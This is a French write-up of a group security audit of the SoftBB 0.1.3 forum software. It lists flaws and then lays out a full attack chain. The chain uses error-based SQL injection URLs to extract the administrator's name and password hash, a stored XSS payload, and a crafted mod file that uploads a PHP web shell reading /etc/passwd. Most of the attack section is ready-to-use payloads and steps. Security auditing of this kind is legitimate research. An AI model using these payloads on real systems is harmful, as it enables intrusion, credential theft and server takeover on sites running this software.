====Zenk Roulette 4 : SoftBB 0.1.3====

**Date :** le dimanche 16 août 2010 de 20h à 01h00.

**Application auditée :** SoftBB 0.1.3 : http://www.softbb.net

**Description :** Il s'agit d'un forum très léger.

**Pad :** http://piratepad.net/dlkZwSHTPz


------------------------------------------------------------------------------

==Défauts de sécurité :==

De nombreux défauts de sécurité ont été identifiés. Certains sont exploitables en tant que simple visiteur (enregistré ou non) du site et d'autres ne sont accessibles qu'à une personne ayant les droits d'administrateur.

  *  **Full Path Disclosure:** 
<file>http://localhost/softbb/index.php?page[]=reg</file>

  * Les mots de passes sont stockés dans la base de données sous la forme de simples hash md5.

  * Une XSS Persistante dans les champs de modifications de style : http://localhost/softbb/admin/index.php?page=gest_opt_mod " onmouseover='javascript:alert(1337)' foo="

  * De nombreuses SQLi (sh4ka, SIG) : 

<file>redir_last_post_list.php - ligne 12 et 16
addmembre.php - lignes 47 et 51
moveto.php - ligne 156
post.php, delgroupe.php, delpost.php, delforum.php</file>



  * Possibilitée d'uploader un fichier php sur le serveur par le biais de l'interface de gestion des mods (bik3te).

------------------------------------------------------------------------------

**Solution retenue :**

  *  Afin d'obtenir un Shell sur le serveur hébergeant un forum SoftBB, la solution la plus aisée est la suivante.


  *  Exploitation d'une SQLi accessible en tant que simple utilisateur afin d'obtenir :


Le nom de l'administrateur
<file>http://localhost/softbb/redir_last_post_list.php?post=1 AND (ExtractValue(1,CONCAT(0x5c,(SELECT(pseudo)FROM(softbb_membres)WHERE id=1))))</file>

Les 31 premiers caractères du hash du mot de passe de l'administrateur
<file>http://localhost/softbb/redir_last_post_list.php?post=1 AND (ExtractValue(1,CONCAT(0x5c,(SELECT(mdp)FROM(softbb_membres)WHERE id=1))))</file>

Le 32ème caractère du hash du mot de passe de l'administrateur
<file>http://localhost/softbb/redir_last_post_list.php?post=1 AND (ExtractValue(1,CONCAT(0x5c,(SELECT(SUBSTR(mdp,32,32))FROM(softbb_membres)WHERE id=1))))</file>



  *  Interrogation de Sorcier_FXK (ou de John) à propos du mot de passe en clair.

  *  Connexion à l'interface d'administration du site.

  *  Exploitation de la faille d'upload dans l'interface de gestion des mods :

  *  Créer un fichier exploit.sbbmod (bik3te) contenant :
<file>#*#*#*#*#*# I N F O S #*#*#*#*#*#
#*#*# NOM du mod : exploit
#*#*# AUTEUR : Zenk-Security
#*#*# DESCRIPTION : Exploitation de la faille d'upload
#*#*# DEPENDANCE1 : 
#*#*# DEPENDANCE2 : 
#*#*# VERSION : 1
#*#*#*#*#*# E X E C U T I O N #*#*#*#*#*#
#*#*# DEBUT ETAPE 1 #*#*#
    ##=> AJOUTER FICHIER:
<?php system("cat /etc/passwd"); ?>
    ##=> NOM:
admin/exploit.php
#*#*# FIN ETAPE 1 #*#*#
</file>

  *  Interface de gestion des mods sur http://localhost/softbb/admin/index.php?page=mods_index
  *  Uploader le fichier exploit.sbbmod et aller sur http://localhost/softbb/admin/exploit.php